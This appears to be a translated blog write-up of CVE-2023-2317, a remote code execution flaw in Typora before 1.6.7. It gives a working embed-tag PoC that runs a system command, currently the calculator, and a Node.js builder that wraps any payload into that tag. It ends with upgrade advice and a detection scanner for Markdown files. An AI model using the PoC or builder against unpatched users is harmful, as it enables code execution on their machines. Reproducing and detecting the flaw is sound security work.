Typora remote code execution vulnerability

Statement:
This article is for technical exchange only. Do not use it for illegal purposes.
Any direct or indirect consequences or losses caused by disseminating or using the information in this article are the sole responsibility of the user; the author bears no responsibility for them.

1. Product introduction

Typora is a lightweight Markdown editor developed by Abner Lee. Unlike other Markdown editors, Typora does not show source code and preview side by side in two columns; it uses WYSIWYG editing, so the document is previewed instantly as it is written, but you can also switch to a source-code editing mode.

2. Vulnerability Overview

Cause: the typora:// protocol

Typora registers a custom typora:// protocol internally, which it uses to load its own bundled files.

Versions of Typora before 1.6.7 are affected (CVE-2023-2317). The vulnerability stems from loading typora://app/typemark/updater/updater.html in an <embed> tag inside a Markdown document: updater.html builds its page content from its URL query parameters (a DOM-based XSS), so attacker-controlled JavaScript ends up running in the Typora main window.

3. Exploiting vulnerabilities

Typora's own pages load bundled resources through this protocol, for example:

<script src="typora://app/typemark/lib.asar/MathJax3/es5/input/tex/extensions/xypic.js" charset="UTF-8"></script>

From this access we can see how the protocol maps to disk: lib.asar is located in the resources folder of the Typora installation directory, and updater.html is located in the updater folder of the Typora installation directory. Therefore, accessing updater.html through the typora:// protocol is written like this:

typora://app/typemark/updater/updater.html?a=xxx&b=xxx&c=xxx

Building the payload

By conventional thinking we would require the child_process module and call its exec function, but require is not defined in the Typora renderer; the reqnode function is exposed instead:

Therefore, the payload on Windows can be written like this:

reqnode('child_process').exec("calc")

Wrap it in an svg tag so that it fires as soon as the page renders; top.eval runs the string in the main window rather than in the embedded frame:

<svg/onload=top.eval(`reqnode('child_process').exec('calc')`)></svg>

To work in both Windows and Linux environments, the payload can pick the command from navigator.platform:

<svg/onload=top.eval(`reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])`)></svg>

Finally, the payload is base64-encoded, placed into the labels array, and the query parameters that carry attacker input (labels, and releaseNoteLink if used) are URL-encoded; in the PoC below releaseNoteLink is left as a dummy value and only labels carries the payload. The final PoC is:

<embed src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
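The PoC above is assembled by hand. The following added example (my own code, not from the original post or from Typora) automates the same construction and its reverse: it base64-encodes a payload, wraps it in the svg onload handler, places it in the labels array and URL-encodes it; and it extracts the payload back out of any PoC tag, which is also a quick way to confirm what a suspicious <embed> found in a Markdown file would execute. It assumes Node.js 16 or later for Buffer and the WHATWG URL parser; the parameter names and values are those of the published PoC.

```javascript
// Added example (not from the original post): build the CVE-2023-2317 PoC from
// the plain payload, and extract the payload back out of a PoC tag.
// Requires Node.js 16+ (Buffer, URL, URLSearchParams).

// Cross-platform payload from the post (Win32 -> calc, Linux -> gnome-calculator).
const PAYLOAD = `reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])`;

// The vulnerable page and how the protocol URL for it looks once parsed.
const UPDATER = 'typora://app/typemark/updater/updater.html';

// Wrap a JS payload so it survives the labels[] JSON and the URL:
// base64 avoids quoting problems inside the onload attribute, the <svg onload>
// fires when updater.html renders the label, and encodeURIComponent keeps the
// src attribute itself well-formed (the published PoC encodes only " < /).
function buildPoc(payload) {
  const b64 = Buffer.from(payload, 'utf8').toString('base64');
  const svg = `<svg/onload=top.eval(atob('${b64}'))></svg>`;
  const labels = JSON.stringify(['', svg, '', '', '', '']);
  const params = [
    'curVersion=111',
    'newVersion=222',
    'releaseNoteLink=333',
    'hideAutoUpdates=false',
    `labels=${encodeURIComponent(labels)}`,
  ].join('&');
  return `<embed src="${UPDATER}?${params}">`;
}

// Reverse the construction: pull the src attribute, parse the query string,
// JSON-decode labels, find the atob() argument and base64-decode it.
// Returns null when the tag does not point at updater.html or carries no payload.
function extractPayload(embedTag) {
  const src = /src="([^"]+)"/.exec(embedTag);
  if (!src) return null;
  let url;
  try { url = new URL(src[1]); } catch { return null; }
  if (`${url.protocol}//${url.host}${url.pathname}` !== UPDATER) return null;
  const labelsRaw = url.searchParams.get('labels');
  if (labelsRaw === null) return null;
  let labels;
  try { labels = JSON.parse(labelsRaw); } catch { return null; }
  if (!Array.isArray(labels)) return null;
  for (const label of labels) {
    const m = /atob\('([A-Za-z0-9+/=]+)'\)/.exec(String(label));
    if (m) return Buffer.from(m[1], 'base64').toString('utf8');
  }
  return null;
}

// Round trip for the reader: the generated tag decodes back to the payload.
console.log(buildPoc(PAYLOAD));
console.log(extractPayload(buildPoc(PAYLOAD)) === PAYLOAD ? 'round trip ok' : 'round trip FAILED');
```

extractPayload also accepts the hand-encoded PoC from the post, since URLSearchParams decodes the partial percent-encoding the same way the page does; the svg element's `>` characters are not a problem because the src value contains no literal double quote.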

Base64-decoding the atob() argument gives back the cross-platform payload shown above.

4. Recurrence of vulnerabilities

When this PoC is rendered in Typora, the <embed> loads updater.html with the DOM-XSS payload in its query string; the svg onload handler runs in the main window through top.eval and executes the system command. The steps are as follows:

1. Download and install a vulnerable version. The version used here is

Typora for Windows 1.5.12 (the installer is available from the Baidu cloud disk below)

Link: https://pan.baidu.com/s/12SMngr3Ks3D_OJ1KO17Zgw?pwd=i13d 
Extraction code: i13d

Tip: the program asks for activation after installation; if you only want to reproduce the vulnerability, activation is not needed.

2. Create a new .md file and paste the PoC into it as a raw HTML block (it must be rendered as HTML, not as literal text):

<embed src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

3. Open the file; the command executes as soon as the document renders.

The calculator pops up, confirming command execution.


4. Test video

It's so blurry after uploading to the platform; everyone can just take a look.

Typora command execution: CVE-2023-2317

5. Repair suggestions

The vendor has released a fixed version: upgrade to Typora 1.6.7 or later. The release notes are at:

https://support.typora.io/What's-New-1.6/
https://buaq.net/go-175535.html?utm_source=feedly
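Until every installation is upgraded, it is worth checking Markdown files from untrusted sources for the trigger. The following added example (my own code, not from the original post or from Typora) scans Markdown text for embedded HTML whose src points at the updater page and reports whether the labels parameter carries markup, which is the DOM-XSS sink the published PoC uses. The tag list and the sample document are assumptions constructed for the demo; it needs only Node.js 12 or later.

```javascript
// Added example (not from the original post or the Typora project): flag
// Markdown that embeds typora://app/typemark/updater/updater.html, the trigger
// for CVE-2023-2317 on Typora before 1.6.7. Node.js 12+, no dependencies.

// Tags that load a URL from src= and would fetch the typora:// page when the
// Markdown is rendered. This list is an assumption for the check, not Typora's.
// The src value may be double-quoted, single-quoted or unquoted.
const TAG_RE = /<(embed|iframe|object|script|img|frame)\b[^>]*\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
const UPDATER_PATH = 'typora://app/typemark/updater/updater.html';

// Returns one finding per offending tag: 1-based line number, tag name, and
// whether the labels parameter contains < or > (markup reaching the DOM sink).
function scanMarkdown(markdown) {
  const findings = [];
  markdown.split(/\r?\n/).forEach((line, i) => {
    for (const m of line.matchAll(TAG_RE)) {
      const tag = m[1].toLowerCase();
      const src = m[2] !== undefined ? m[2] : (m[3] !== undefined ? m[3] : m[4]);
      if (!src.toLowerCase().startsWith(UPDATER_PATH)) continue;
      let labelsHasMarkup = false;
      try {
        const labels = new URL(src).searchParams.get('labels') || '';
        labelsHasMarkup = /[<>]/.test(labels);
      } catch {
        // Unparsable URL: still report the reference, without the labels detail.
      }
      findings.push({ line: i + 1, tag, labelsHasMarkup });
    }
  });
  return findings;
}

// Constructed sample document: one benign typora:// image, one PoC-style embed,
// and one iframe to the updater page with harmless labels.
const SAMPLE = [
  '# Release notes',
  'Normal text with a link to https://typora.io/',
  '<img src="typora://app/typemark/lib.asar/some/icon.png">',
  '<embed src="typora://app/typemark/updater/updater.html?curVersion=1&labels=[%22%3csvg%2fonload=alert(1)%3e%22]">',
  '<iframe src="TYPORA://app/typemark/updater/updater.html?labels=[%22plain%22]"></iframe>',
].join('\n');

for (const f of scanMarkdown(SAMPLE)) {
  console.log(`line ${f.line}: <${f.tag}> loads updater.html` +
    (f.labelsHasMarkup ? ' with markup in labels (DOM-XSS payload)' : ''));
}
```

Any hit is worth a look even when labelsHasMarkup is false, because a legitimate document has no reason to embed the updater page at all; the markup check only ranks the finding.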

Source: blog.csdn.net/qq_56698744/article/details/132755730